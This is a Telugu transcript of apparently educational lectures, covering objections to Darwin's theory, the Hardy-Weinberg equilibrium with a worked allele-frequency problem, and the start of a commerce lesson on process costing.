ఎందువలన అభివృద్ధి చెందాయి, ఏ కారణంగా అభివృద్ధి చెందాయి అని వివరించడంలో కూడా డార్విన్ విఫలమయ్యారు. అట్లాగే ఉపయుక్త భావాల ఆవిర్భావం, మాధ్యమిక రూపాలను గురించి వివరించలేదు. ఏ అయితే ఉపయుక్తంగా జీవికి ఉపయుక్తంగా ఉన్నటువంటి అవయవాలను పేర్కొన్నామో ఆ ఉపయుక్త అవయవాలు ఏ రకంగా ఎందుకు ఏర్పడినవి, అంతకుముందు అక్కడైతే కనుక చెప్పున్నాడు లామార్క్, దాంట్లో శరీర ధర్మపైన మార్పు, బాహ్య నిర్మాణంలో మార్పులు సంభవిస్తుంది. బట్ ఇక్కడ ఆ వివరణ అనేది సమంగా చేయలేదు. తర్వాత సహానుకూలత ద్వారా ఏర్పడిన భాగాలను వివరించలేదు. కో అడాప్టేషన్, ఒక అనుకూలత వచ్చింది, ఒక లక్షణానికి సంబంధించి ఈ అడాప్షన్, ఈ అనుకూలత అనేది పొందింది. దాంతోపాటుగా ఇంకొక లక్షణంలో కూడా చిన్న మార్పు అనేది సంభవించవచ్చు. అది ఎందువలన సంభవించింది, ఎందువలన మారింది, ఆ తెగగా ఎందుకు ఏర్పడింది అనేది విశ్లేషించడంలో డార్విన్ విఫలమయ్యారన్నమాట. తర్వాత స్థూల వైవిధ్యాలు, సూక్ష్మ, ఇప్పుడు లక్షణాలు, చిన్న చిన్న లక్షణాల గురించి వివరం జరిగింది. పెద్ద బాహ్యంగా సంభవించినటువంటి పరిమాణాన్ని గుర్తించదగినటువంటి మార్పులకు సంబంధించిన మార్పుల గురించి వివరించలేకపోయింది. తర్వాత కొత్త జీవులకు ప్రాచీన జీవులకు మధ్య ఉండు మాధ్యమిక రూపాలను గురించి వివరించలేదు. సో ఇంటర్మీడియట్ అంటే మధ్యస్థంగా కొన్ని రూపాలు ఉంటాయి, ఆ మధ్యస్థ రూపాలను గురించి ఎక్కడా కూడా డార్విన్ ప్రస్తావించలేదు. సో ఇవన్నీ కూడా డార్విన్ సిద్ధాంతానికి సంబంధించినటువంటి అభ్యంతరాలు. సో డార్విన్ సిద్ధాంతాన్ని కనుక మనం ఇప్పుడు చెప్పినటువంటి అంశాన్ని మొత్తం కనుక మనం ఒక నక్షల్లో చూస్తే కనుక, మొదట చెప్పినటువంటి ప్రత్యుత్పత్తి సామర్థ్యం, పరిసరాల ఒత్తిడి, ఈ రెండూ కలిస్తే మనం చూసేది మనుగడ కోసం పోరాటం. ఆ మనుగడ కోసం పోరాటంలో వైవిధ్యాలు పొందుతాయి. ఈ వైవిధ్యాలు పొందినటువంటి వైవిధ్యాలు ప్రకృతి ఎంపిక చేసుకుంటుంది, దాన్ని ప్రకృతి వర్ణం అంటాం. ఈ ప్రకృతి వర్ణం వాతావరణ మార్పులు కలిసి పరిణామానికి దారితీస్తే అని డార్విన్ చెప్పినటువంటి మనం డార్వినిజంగా మనం దీని యొక్క సారాంశంగా మనం తీసుకొనవచ్చు. సో ఈ పాఠం నుంచి వచ్చేటువంటి ప్రశ్నలు తీసుకుంటే కనుక డార్వినిజం గురించి ఒక వ్యాసం రాయండి, మనుగడ కోసం పోరాటంను చర్చించండి, యోగ్యతమాల సాధక జీవనంను వివరించండి, ప్రకృతి వర్ణంను చర్చించండి. సో మొదటిదేమన్నా ఎస్ఏ క్వశ్చన్ వస్తుంది, మిగతా 3 షార్ట్ క్వశ్చన్లు. థ్యాంక్ యూ. సో జీవ పరిణామానికి సంబంధించి ఇందాక లామార్కిజం, డార్వినిజం చూసాము. ఇప్పుడు డార్వినిజంలోనే డార్విన్ చెప్పినటువంటి అంశాలన్నింటినీ క్రోడీకరించి అందులో వాదనలను బలపరుస్తూ నియో డార్వినిజం, నూతన పరిణామ సంశ్లేషణ సిద్ధాంతం అనే దాన్ని వివరిస్తూ దానికి సంబంధించి కొన్ని అంశాలను వేరువేరుగా వేరువేరు శాస్త్రవేత్తలు ప్రతిపాదించడం జరిగింది. అందులో ముఖ్యమైనటువంటి అంశం లేదా ముఖ్యమైనటువంటి సూత్రం ఏంటంటే హార్డీ వెయిన్బర్గ్ సమతాస్థితి లేదా హార్డీ వెయిన్బర్గ్ ఈక్విలిబ్రియం అంటారు. సో జీవ పరిణామంలో యూనిట్ లెవెల్ అంటే సూక్ష్మ స్థాయికి వెళ్ళి విశ్లేషించినటువంటి సూత్రం ఈ హార్డీ వెయిన్బర్గ్ సూత్రం. ఇందాక మనం లామార్కిజం కానీ డార్వినిజం కానీ తీసుకున్నప్పుడు కంటికి కనిపించేటటువంటి మార్పులు ఏ రకంగా అనువంశికత చెందుతాయి, ఈ మార్పుల కారణంగా మనం పరిణామాన్ని ఏ రకంగా గుర్తించవచ్చు అనేది వివరించారు. కానీ ఇప్పుడు చూసేటటువంటి హార్డీ వీన్బర్గ్ సమతాస్థితి లేదా హార్డీ వీన్బర్గ్ ఈక్విలిబ్రియం మనం ఏం చూస్తామంటే పౌనఃపున్యాలు, జన్యు పౌనఃపున్యాలకు సంబంధించి ఆ పౌనఃపున్యాలలో సంభవించేటటువంటి మార్పుల కారణంగా పరిణామం సాధ్యమా కాదా, ఎలా ఆ జన్యు పౌనఃపున్యాలలో మార్పులు సంభవిస్తాయి, మార్పులు సంభవించేందుకు అవకాశం ఉందా అనే దాన్ని మనం విశ్లేషించడం అనేది జరుగుతుంది ఇక్కడ. సో హార్డీ వీన్బర్గ్ సమతాస్థితి,
ఈ పాఠ్యాంశం యొక్క ఉద్దేశం ఏంటంటే ఈ హార్డీ వీన్బెర్గ్ సమతా స్థితి గురించి మనం ఎనాలిసిస్ చేద్దాం, విశ్లేషణ చేద్దాం. అసలు హార్డీ వీన్బెర్గ్ సమతా స్థితి అంటే ఏంటి, దాంట్లో ఏ రకమైనటువంటి చరరాశులు ఉంటాయి, ఆ చరరాశులకి ఏ రకమైన విలువలు ఉంటాయి, ఏ విలువ ఇస్తే కనుక దాంట్లో మార్పులు సంభవిస్తాయని చూద్దాం. సో మొదటగా ఈ హార్డీ వీన్బెర్గ్ సమతా స్థితి గురించి మనం అధ్యయనం చేసేటప్పుడు ఇది ఒక ప్రాబబుల్ అంటే సంభావ్యత మాత్రమే, ల్యాబొరేటరీ ప్రయోగశాలలో సాధ్యపడేటటువంటి అంశం, ప్రయోగశాలలో ఉన్నటువంటి జనాభాకు సంబంధించిన అంశమే. సహజ జనాభాలో హార్డీ వీన్బెర్గ్ సమతా స్థితి సాధ్యము కాదు అని మనం దృష్టిలో పెట్టుకోవాలి. అంటే శాస్త్రవేత్తలు జన్యు పౌనఃపున్యాల గురించి లెక్కించడానికి, జన్యు పౌనఃపున్యాలు ఏ రకంగా ఉంటాయి ఒక జనాభాలో అనే దాన్ని విశ్లేషించడానికి సంబంధించి ఒక ప్రయోగపూర్వక నిరూపణ చేసినటువంటి సూత్రమే ఈ హార్డీ వీన్బెర్గ్ సూత్రం అనేది మనం దృష్టిలో పెట్టుకోవాలి. సో హార్డీ వీన్బెర్గ్ సమతా స్థితి యొక్క నిర్వచనం తీసుకుంటే కనుక హార్డీ వీన్బెర్గ్ సమతా స్థితి జనాభాలోని యుగ్మ వికల్పాల పౌనఃపున్యానికి లేదా జన్యు పౌనఃపున్యానికి సంబంధించినది. ఇంతకుముందు మనం లామార్క్ సిద్ధాంతంలో కానీ డార్విన్ సిద్ధాంతం కానీ బయట కనిపిస్తున్నాయి, జిరాఫీ మెడ అన్నాం, లేకపోతే ఎలుకల్లో తోకలు అన్నాం, అవి చెప్పాం. బట్ ఇవి కంటికి కనిపించినటువంటి జీవ పరిణామ ప్రమాణాలు. సో దాని గురించి ఈ హార్డీ వీన్బెర్గ్ సూత్రం అనేది వివరిస్తుంది. సో హార్డీ వీన్బెర్గ్ సమతా స్థితి ప్రకారం కొన్ని నిర్దిష్ట పరిస్థితులలో, ఇది మోస్ట్ ఇంపార్టెంట్, కొన్ని నిర్దిష్ట పరిస్థితులలో, ఆ పరిస్థితులు ఏంటో తర్వాత చూస్తాం, ఒక జనాభాలోని బహిర్గత మరియు అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు ఒక తరం నుండి మరొక తరానికి స్థిరంగా ఉంటాయి. సో మనం మెండల్ సూత్రాలు తీసుకున్నప్పుడు మెండల్ సూత్రాలలో మెండల్ చెప్పినటువంటి మొదటి సూత్రం బహిర్గతత్వ సూత్రం. ఈ బహిర్గతత్వ సూత్రం ప్రకారం ఏం చెప్పారు, ఒక జనాభా తీసుకున్నప్పుడు జనాభాలో రెండు ప్రధానమైనటువంటి లక్షణాలు కనిపిస్తూ ఉంటాయి. సంకలన ప్రయోగం మనం జరిపినప్పుడు జనకతరంలో ఉన్నటువంటి లక్షణాలలో ఏ లక్షణమైతే మొదటి తరం F1 తరంలో కనిపిస్తుందో ఆ కనిపించినటువంటి లక్షణాన్ని బహిర్గత లక్షణం అన్నాం. కనిపించకుండా F2 తరంలో కనిపించేటటువంటి లక్షణం ఏదైతే ఉందో ఆ లక్షణాన్ని అంతర్గత లక్షణం అంటాం. సో ప్రతి జనాభా తీసుకున్నప్పుడు ఈ రెండు లక్షణాలు మనకు కనిపిస్తూ ఉంటాయి. ఒకటి బహిర్గత లక్షణం, రెండోది అంతర్గత లక్షణం. సో ఈ హార్డీ వీన్బెర్గ్ సమతా స్థితి లేదా హార్డీ వీన్బెర్గ్ సూత్రం ఏమని వివరిస్తుంది, ఒక జనాభాలో ఉన్నటువంటి బహిర్గత మరియు అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు, ఫ్రీక్వెన్సీ అంటే ఎన్నిసార్లు బహిర్గత లక్షణం ప్రతిబింబించవచ్చు లేదా వ్యక్తీకరణ కావచ్చు, ఎన్నిసార్లు అంతర్గత లక్షణానికి సంబంధించి వ్యక్తీకరణ, ఆ జన్యు వ్యక్తీకరణ కావచ్చు అనేది విశ్లేషిస్తుంది ఈ హార్డీ వీన్బెర్గ్ సమతా స్థితి. ఆయన ఏం చెప్తాడంటే ఈ హార్డీ వీన్బెర్గ్ సూత్రం ప్రకారం ఈ అంతర్గత మరియు బహిర్గత జన్యు పౌనఃపున్యాలు ఒక తరం నుంచి మరొక తరానికి ఎల్లప్పుడూ స్థిరంగా ఉంటాయి అని ఈ హార్డీ వీన్బెర్గ్ సూత్రం యొక్క ప్రతిపాదన. ఎలా ఉంటుందో ఏంటో చూద్దాం. సో మనం నిర్దిష్ట పరిస్థితులు అని చెప్పాం. ఆ పరిస్థితులు తీసుకుంటే కనుక మొదటిది అతి పెద్ద జనాభా ఉండాలి. రెండవ అంశం జనాభాలోని జీవుల మధ్య స్వేచ్ఛగా సంపర్కం జరగడం. 3 ఉత్పరివర్తనాలలో రేటులో మార్పు లేకపోవడం, అంటే మ్యుటేషన్స్ అనేవి జరగకూడదు. తర్వాత వర్ణం లేకుండా అన్ని జన్యు రూపాలు సమానంగా ఫలవంతమైనవి కావడం. సో ఏదైతే ప్రత్యుత్పత్తి పరంగా తీసుకున్నప్పుడు పరంగా అన్ని జీవులు కూడా ఫలవంతమైనటువంటి జీవులు ఉత్పత్తి కావాలి. తర్వాత తరాల మధ్య అంతరంలో తేడా లేకపోవడం, అంటే ఒక తరానికి మధ్య ఎక్కువ గ్యాప్, ఎక్కువ వ్యవధి అనేది లేకపోవడం అనేది ఇంకొక అంశం. ఇంకొక ప్రధానమైన అంశం చివరిది జనాభా నుండి వలసలు జరగకపోవడం. మరియు వలస అంటే జనాభాలో నుంచి కొంత జనాభా బయటికి పోకూడదు, అట్లాగే ఆ జనాభాలోకి కొత్త జనాభా వచ్చి చేరకూడదు. సో ఈ అంశాలు గనక ఫుల్ఫిల్ చేస్తే, ఈ అంశాలు గనక అక్కడ నిర్ధారణ జరిగితే అటువంటి జనాభాలో మనం హార్డీ వీన్బెర్గ్ సమతా స్థితిని చూడవచ్చు. సాధారణ మరి ప్రకృతి పరంగా సహజ జనాభా తీసుకున్నప్పుడు ఇవన్నీ సాధ్యం కానటువంటి అంశాలు. అందుకే మొదటే చెప్పాను మీకు, ప్రయోగశాలలో ప్రయోగపూర్వకంగా
జన్యు పౌనఃపున్యాలు లెక్కించడానికి ఉపయోగించేటటువంటి ఒక సమతా స్థితి అని చెప్పాం. సో సాధారణంగా సహజ సిద్ధంగా మనం దీనిని నిరూపణ చేయలేం. నెక్స్ట్ చూడం. సో యుగ్మ వికల్పాల ఇక్కడ 3 అంశాలని ఈ హార్డీ వీన్బెర్గ్ సమతాస్థితిలో చర్చించడం జరిగింది. మొదటిది యుగ్మ వికల్పాల పౌనఃపున్యంలో సమతాస్థితి. ఒక జనాభాలోని దైహిక క్రోమోజోముల యందరి లోకస్ల వద్ద ఉన్న యుగ్మ వికల్పాల పౌనఃపున్యం తరాలను బట్టి మారదు. బహిర్గత అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యం స్థిరంగా ఉంటుంది. సో మనకు క్రోమోజోములు తెలుసు. క్రోమోజోముల మీద లోకస్ అంటే ఏ స్థానం వద్ద అయితే జన్యువులు ఉంటాయో దాన్ని లోకస్ అంటాం. వీటి యొక్క పౌనఃపున్యం అంటే ఎన్నిసార్లు ఈ జన్యువు ఆ జనాభాలో ప్రతిబింబిస్తోంది అనేటటువంటి పరిగణలోకి తీసుకున్నప్పుడు అది ఎల్లప్పుడూ స్థిరంగానే ఉంటుంది. ఆ పౌనఃపున్యాల నిష్పత్తి ఏది అంతర్గత బహిర్గత లక్షణానికి సంబంధించి ఆ జన్యువులు ఏదైతే వ్యక్తీకరణ జరుగుతుందో ఆ వ్యక్తీకరణ యొక్క అంటే ఎన్నిసార్లు తరచుదనం అంటాం మనం, ఎన్నిసార్లు వస్తుంది, బహిర్గత లక్షణం ఎన్నిసార్లు వచ్చింది, అంతర్గత లక్షణం ఎన్నిసార్లు వచ్చింది అనేది మనం లెక్కిస్తే అది ఎల్లప్పుడూ స్థిరంగా ఉంటుందని చెప్తుంది మొదటి అంశం. రెండవ అంశం, ఒక జనాభాలోని జన్యురూప పౌనఃపున్యాలు యుగ్మ వికల్పాల పౌనఃపున్యం మీద ఆధారపడి ఉంటాయి. సో ఇందాక మనం అంతర్గత లక్షణం ఎన్నిసార్లు వస్తుంది, బహిర్గత లక్షణం బహిర్గత జన్యువు ఎన్నిసార్లు వ్యక్తీకరణ జరిగిందో వివరించాం. తర్వాత రెండో అంశం ఏం చెప్తాడంటే జన్యురూప పౌనఃపున్యాలు అంటే జన్యుపరంగా అది అంతర్గతమా బహిర్గతంగా అంటే అది సమయుగ్మజమా విషమయుగ్మజమా అనే అంశం కూడా దీంట్లో వివరిస్తాం అనేది జరుగుతుంది. నెక్స్ట్ మూడో అంశం, ఏ కారణం చేతనైనా యుగ్మ వికల్పాల పౌనఃపున్య సమతాస్థితి చెదిరిపోతే అంటే ఒకవేళ పొరపాటున వాటి యొక్క ఈక్విలిబ్రియం కనుక చెదిరిపోతే మళ్ళీ ఏమవుతుంది, అదే జనాభాలో స్వేచ్ఛా సంగమం ద్వారా ఫ్రీ మేటింగ్ ద్వారా తిరిగి స్థాపించబడుతుంది. అంటే ఆ జనాభా అనే కూడా ఏం చేస్తుంది, అక్కడ స్పెషల్గా ప్రత్యేకంగా అభివృద్ధి చేసుకుంది. అంటే యుగ్మ వికల్పాల పౌనఃపున్యంలో మార్పు సంతరించిందనే జనాభాకు అర్థమైనప్పుడు అంటే జనాభాలో బహిర్గత లక్షణాలు అంతర్గత లక్షణాల యొక్క సంఖ్య కానీ వాటి యొక్క వ్యక్తీకరణ యొక్క తరచుదనం కానీ ఏదైతే పౌనఃపున్యం ఉందో ఎన్నిసార్లు వస్తుందో తీసుకున్నప్పుడు అది మారినది అని అనుకున్నప్పుడు ఆ జనాభాలోనే స్వేచ్ఛా సంగమం అనేది జరిగి మళ్ళీ అది స్థిరీకరింపబడుతుందని వివరిస్తుంది. సో దీని గురించి చూద్దాం. ఒక జనాభాలోని బహిర్గత అంతర్గత యుగ్మ వికల్పాల పౌనఃపున్యాలు పరిగణలోకి తీసుకుని హార్డీ మరియు వేన్బెర్గ్ అనే గణిత శాస్త్రవేత్తలు ఒక సమీకరణాన్ని హార్డీ మరియు వేన్బెర్గ్ అనేటువంటి వాళ్ళు గణిత శాస్త్రవేత్తలు వాళ్ళు ఒక సమీకరణాన్ని అది ద్విపద సిద్ధాంతం చూద్దాం ఇక్కడ. సో వాళ్ళు ప్రతిపాదించింది ఏంటంటే P+Q=1 ఎల్లప్పుడూ స్థిరంగా ఉంటుంది పౌనఃపున్యాలు అని చెప్పు. అట్లాగే P+Q² దాన్నే కనుక ద్విపద రూపంలో కనుక రాసుకుంటే A+B² రూపంలో P² + 2PQ+Q² 1. సో దీనిని వివరణాత్మకంగా తీసుకుంటే P అంటే ఏంటంటే బహిర్గత దృశ్యరూప లక్షణ పౌనఃపున్యం. ఇందా చెప్పుకున్నాం మనం మెండల్ సూత్రాలను బట్టి బహిర్గత లక్షణం అంటే ఏంటి, ఏదైతే F అంతరంలో వ్యక్తీకరణ జరుగుతుందో ఆ బహిర్గత లక్షణం అన్నాం. ఆ బహిర్గత దృశ్యరూప లక్షణ పౌనఃపున్యం P. Q అంటే ఏంటి, అంతర్గత దృశ్యరూప లక్షణం యొక్క పౌనఃపున్యం. అంటే అంతర్గత దృశ్యరూప లక్షణం అంతర్గత లక్షణము ఎన్నిసార్లు వచ్చింది పౌనఃపున్యం ఎన్నిసార్లు అక్కడ ప్రకటితమైంది ఎన్నిసార్లు వ్యక్తీకరణ జరిగింది. అట్లాగే P². సో ఇందాక దృశ్య రూపానికి సంబంధించింది, స్క్వేర్ వచ్చేసరికి జన్యు రూపానికి సంబంధించింది. P² సమయుగ్మజ చూడండి అక్కడ. సో జన్యు రూపంలో రెండు యుగ్మ వికల్పాలు ఒకే రకంగా ఉన్నాయి కాబట్టి సమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం P². తర్వాత 2PQ తీసుకోండి, విషమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం. దాని తర్వాత Q² తీసుకోండి, సమయుగ్మజ అంతర్గత జన్యురూప పౌనఃపున్యం. సో ఈ మూడు కూడా జన్యురూపాల పౌనఃపున్యానికి సంబంధించింది. ఈ రెండు దృశ్యరూప పౌనఃపున్యానికి సంబంధించింది. అంటే రెండింటినీ వివరిస్తుంది. ఇప్పుడు మనం 3 మౌలిక అంశాలను చెప్పుకున్నాం ఇందాక. హార్డీ వీన్బెర్గ్ సమతాస్థితిలో 3 మౌలిక అంశాలను గురించి విశ్లేషణ చేయడం జరుగుతుందని చెప్పి. సో అందులో ఇక్కడ చూస్తే కనుక దృశ్యరూపం గురించి వివరిస్తుంది, అట్లాగే జన్యురూపాల గురించి జన్యురూప యుగ్మ వికల్పాల పౌనఃపున్యాల గురించి వివరించడం అనేది జరుగుతుంది. ఏది చెప్పినా కానీ ఇవన్నీ కూడా ఎల్లప్పుడూ నిర్దిష్టంగా మార్పు లేకుండా ఉంటాయని వివరిస్తుంది.
సో అంతే, అంతకుముందు అందుకే రాసాం మనం P+Q అంటే దృష్టి రూప లక్షణాల పౌనఃపున్యం ఒకటే అయింది. అట్లాగే P+Q హోల్ స్క్వేర్ వేసాం అంటే P² + 2PQ + Q². సో ఇవన్నీ కూడా కూడుకున్నా కానీ అంటే జన్యురూప పౌనఃపున్యాల మొత్తం కూడా కూడుకున్నా కానీ అది కూడా స్థిరంగానే ఉంది. అది ఎలా సాధ్యపడుతుందో కూడా చూద్దాం ఇప్పుడు. సో దీన్ని తీసుకుంటే కనుక ఇప్పుడు మనం చెప్పాం P² అంటే సమయుగ్మజ బహిర్గత జన్యురూప పౌనఃపున్యం ఇలా వచ్చింది. P² ఎందుకు వేసామంటే కారణం అది. సో ఇది దృష్టి రూపం ఇది దృష్టి రూపం అనేప్పుడు ఈ రెండు కలిస్తే కనుక జన్యురూపం అవుతుంది. అట్లాగే ఇక్కడ ఇది విషమయుగ్మజం అనేది ఇది సమయుగ్మజమైంది. సమయుగ్మజ జన్యురూపం లక్షణం మాత్రం అంతర్గత లక్షణం, ఇక్కడ బహిర్గత లక్షణం, ఇక్కడ బహిర్గత లక్షణం విషమయుగ్మజం అనమాట. సో ఆ కారణంగా దాన్ని ఉదాహరణగా మనం తీసుకోవడం జరిగింది. సో దీనికి సంబంధించి ఒక సమస్యని కనుక చేస్తే మీకు అర్థమవుతుంది. ఇక్కడ చూడండి, ఇక్కడ 200 జీవులు గల జనాభాలో సమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 114. సమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 114. అట్లాగే విషమయుగ్మజ బహిర్గత లక్షణం గల జీవుల సంఖ్య 76. అలాగే సమయుగ్మజ అంతర్గత లక్షణం గల జీవుల సంఖ్య 10. అయితే వాటి యొక్క జన్యు పౌనఃపున్యాలను లెక్కించండి. అంటే P కట్టాలి, Q కట్టాలి, P+Q = 1 నిరూపించాలి. అట్లాగే P² కట్టాలి, Q² కట్టాలి, P² + 2PQ P² + Q² + 2PQ = 1 కూడా నిరూపించాలి. ప్రయత్నం చేద్దాం. సో ఇది చెప్పుకున్నాం కదా, మెండల్ యొక్క ఏకసంకలన ప్రయోగం ప్రకారం ఎట్లా వచ్చిందంటే P² PQ Q² రావడానికి మెండల్ ఏకసంకలన ప్రయోగం కారణం. ఆ దృష్ట్యా అంటే ఏకసంకలన ప్రయోగంలో ఉన్నటువంటి సంభావ్యత ఏ రకంగా జన్యువులు కానీ కలుస్తున్నాయో తీసుకుని దాని ప్రకారం మనం లెక్కన చేయబోతున్నాం. సో మొదటగా మనం బహిర్గత యుగ్మ వికల్పం క్యాపిటల్ A ఇందాక మనం ఇంతకు ముందు స్లైడ్లో చూస్తే కనుక ఇది బహిర్గతం అని తీసుకుంటే, సో బహిర్గత యుగ్మ వికల్పం A, సో దానిని లెక్కిస్తున్నాం. బహిర్గత యుగ్మ వికల్పం A దాని యొక్క పౌనఃపున్యం అంటే A అనేటటువంటి యుగ్మ వికల్పం P సార్లు వస్తుంది అనుకుంటే కనుక దాన్ని ఎలా లెక్కిస్తాం? దానికి సూత్రం ఏంటంటే 2 × బహిర్గత సమయుగ్మజ జీవుల సంఖ్య, ఇక్కడ లెక్కలో ఇచ్చాడు సమయుగ్మజ జీవుల సంఖ్య ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య బై 2 × జనాభాలోని జీవుల సంఖ్య. సో దీన్ని కనుక మనం ఒక లెక్క ఇక్కడ తీసుకుంటే కనుక సో ఇక్కడ 2 × బహిర్గత సమయుగ్మజ జీవుల సంఖ్య ఎంత అండి? 114 ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య 76 బై 2 × జనాభాలోని జీవుల సంఖ్య. జనాభాలోని మొత్తం జీవుల సంఖ్య 200 ఇచ్చారండి. సో దీన్ని కనుక సూక్ష్మీకరిస్తే ఇక్కడ 228 ప్లస్ 76 బై 400 వస్తుంది. సో దాన్ని సూక్ష్మీకరిస్తే కనుక 304 బై 400. సో దీన్ని తీసుకుంటే డివైడ్ చేస్తే కనుక 0.76 వస్తుంది. సో మీరు గనక ఇక్కడ తీసుకుంటే మనం ఏం కట్టాము? ఇక్కడ P అంటే బహిర్గత యుగ్మ వికల్పం A యొక్క పౌనఃపున్యం అంటే ఈ A అనేటటువంటి యుగ్మ వికల్పం ఈ 200 కలిగినటువంటి జనాభాలో 0.76% వస్తూ ఉంది అని విశ్లేషణ చేశాం, లెక్కించాం. అట్లాగే తర్వాత స్లైడ్కి వెళ్దాం. నెక్స్ట్ చూద్దాం అంతర్గత యుగ్మ వికల్పం. ఇందాక మనం మెండల్ ప్రయోగంలో చూసాం కదా, క్యాపిటల్ A స్మాల్ a విషమయుగ్మజ లక్షణం అని, ఏ సమయుగ్మజ అంతర్గత లక్షణం. దాని పౌనఃపున్యం ఎట్లా చూద్దాం? 2 × అంతర్గత సమయుగ్మజ జీవుల సంఖ్య ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య బై 2 × జనాభాలోని జీవుల సంఖ్య. అంటే అంతర్గత యుగ్మ వికల్పం A అనేది Q సార్లు వస్తే Q యొక్క విలువ ఎంత అనేది లెక్కిస్తాం మనం. సో 2 × అంతర్గత సమయుగ్మజ జీవుల సంఖ్య ఇక్కడ ఇచ్చారండి. సమయుగ్మజ అంతర్గత లక్షణం గల జీవులు 10
ప్లస్ విషమయుగ్మజ జీవుల సంఖ్య ఇందాకేసాం 76 బై 2 ఇంటూ 200. సో ఈజ్ ఈక్వల్ టు ఇది 20 ప్లస్ 76 బై 400 తీసుకుంటే కనుక 96/400 అవుతుంది. దీన్ని కనుక సూక్ష్మీకరిస్తే 0.24 వస్తుంది. సో మనకి పి ఇందాక వచ్చింది 0.76, క్యూ 0.24 వచ్చింది. సో ఈ ఆర్డి వీన్బర్గ్ సూత్రం ప్రకారం ఈ పౌనఃపున్యాలు ఎల్లప్పుడూ స్థిరంగా ఉండాలి అని చెప్పాం. ఉన్నాయో లేదో తర్వాత స్లైడ్లో చూద్దాం. మనం ఇక్కడ గమనించండి ఒకసారి. సో ఇక్కడ చూడండి, ఇక్కడ ఇందాక మనం పి క్యాలిక్యులేట్ చేస్తే 0.76 వచ్చింది, క్యూ క్యాలిక్యులేట్ చేస్తే 0.24 వచ్చింది, పి ప్లస్ క్యూ కనుక వస్తే 1 వచ్చింది, పి స్క్వేర్ ప్లస్ 2pq ప్లస్ క్యూ స్క్వేర్ అలా చేసినా కానీ మీకు ఎల్లప్పుడూ వచ్చింది. సో ఆర్డి వీన్బర్గ్ సమతాస్థితి మనకి విశ్లేషించేది ఏంటంటే దృశ్యరూప సంబంధించి పౌనఃపున్యాలు కానీ జన్యురూప యుగ్మ వికల్పాల పౌనఃపున్యాలు కానీ ఒక జనాభాలో ఎల్లప్పుడూ కూడా స్థిరంగా ఉంటాయని హార్డీ వీన్బర్గ్ సమతాస్థితి అనేది దాని ద్వారా మనం విశ్లేషించి తెలుసుకోవచ్చు. సో ఈ పాఠ్యాంశం నుంచి హార్డీ వీన్బర్గ్ సమతాస్థితి గురించి వ్యాసం డైరెక్ట్గా ఎస్ఏ క్వశ్చన్ వస్తుంది. థ్యాంక్ యూ. వ్యూయర్స్, ఈరోజు మనం కాస్టింగ్ అంశానికి సంబంధించి ప్రాసెస్ కాస్టింగ్ అనేటటువంటి ఒక అంశం గురించి పూర్తిగా మనం తెలుసుకోబోతున్నాం. కాస్టింగ్లో అతి ముఖ్యమైనటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ప్రాసెస్ కాస్టింగ్ గురించి తెలుసుకునే ముందుగా కాస్టింగ్ యొక్క టోటల్ స్ట్రక్చర్ ఒకసారి మనం చూద్దాం. కాస్టింగ్ని టోటల్గా 3 భాగాలుగా విభజించడం జరిగింది. ఆ 3 భాగాలు ఏంటంటే కాస్ట్ అకౌంటింగ్ సిస్టమ్స్ అని, కాస్ట్ అకౌంటింగ్ మెథడ్స్ అని, కాస్ట్ అకౌంటింగ్ టెక్నిక్స్ అని ఇలా 3 భాగాలుగా విభజించడం జరిగింది. ఇలా విభజించినటువంటి ఈ 3 భాగాల్లో ఈరోజు మనం తెలుసుకోబోయేటటువంటి అంశం ప్రాసెస్ కాస్టింగ్. ఇది కాస్ట్ అకౌంటింగ్ మెథడ్స్లోకి వస్తుంది. ఈ అంశాల్లో అతి ముఖ్యమైనటువంటి అంశాలు ఏంటున్నాయి ఒకటి మనం చూసినట్లయితే ముందుగా మనం ప్రాసెస్ కాస్టింగ్ ప్రాథమిక అంశాల గురించి చూద్దాం. ప్రాసెస్ కాస్టింగ్ ఏ పరిశ్రమల్లో అవలంబిస్తారు అన్నది కానీ ఒకసారి చూసినట్లయితే అసలు ప్రాసెస్ కాస్టింగ్ అంటే ఏంటి ఒకసారి చూద్దాం. కొన్ని పరిశ్రమల్లో వస్తూత్పత్తి దశల వారీగా జరుగుతూ ఉంటుంది. ఒక్కొక్క దశను ఒక్కొక్క ప్రాసెస్ అంటాం. ఈ తరహా పరిశ్రమలను ప్రాసెస్ పరిశ్రమలు అంటారు. ఈ పరిశ్రమల్లో అనుసరించేటటువంటి కాస్టింగ్ను ప్రాసెస్ కాస్టింగ్ అంటాం. ఈ ప్రాసెస్ కాస్టింగ్ అనేటటువంటి పద్ధతిని మనం అవలంబించాలి అంటే ఖచ్చితంగా ఆ పరిశ్రమలోని వస్తూత్పత్తి అనేది దశల వారీగా జరుగుతూ ఉండాలి. అలా దశల వారీగా జరుగుతున్నటువంటి పరిశ్రమల్లోనే ఈ ప్రాసెస్ కాస్టింగ్ అనేది అమలు చేయడం జరుగుతూ ఉంటుంది. ఈ ప్రాసెస్ కాస్టింగ్లో ఉండేటటువంటి ఏ పరిశ్రమలు ఉన్నాయి ఒకసారి మనం చూసినట్లయితే ప్రాసెస్ కాస్టింగ్ అవలంబించేటటువంటి పరిశ్రమలు చూస్తే నూనె శుద్ధి కర్మాగారాలు, రసాయనిక పరిశ్రమలు, రంగుల పరిశ్రమలు, సిమెంట్ పరిశ్రమలు, పంచదార పరిశ్రమలు, కాగితపు పరిశ్రమలు, అలాగే సబ్బుల పరిశ్రమలు, బిస్కెట్ల పరిశ్రమలు, వస్త్ర పరిశ్రమలు, పాడి వస్తువుల పరిశ్రమలు, మాంసపు పరిశ్రమలు, కలప పరిశ్రమ, బంగారం పరిశ్రమ, ఔషధాల పరిశ్రమ. ఈ పరిశ్రమలు కానీ ఉత్పత్తి కానీ ఒకసారి మనం చూసినట్లయితే
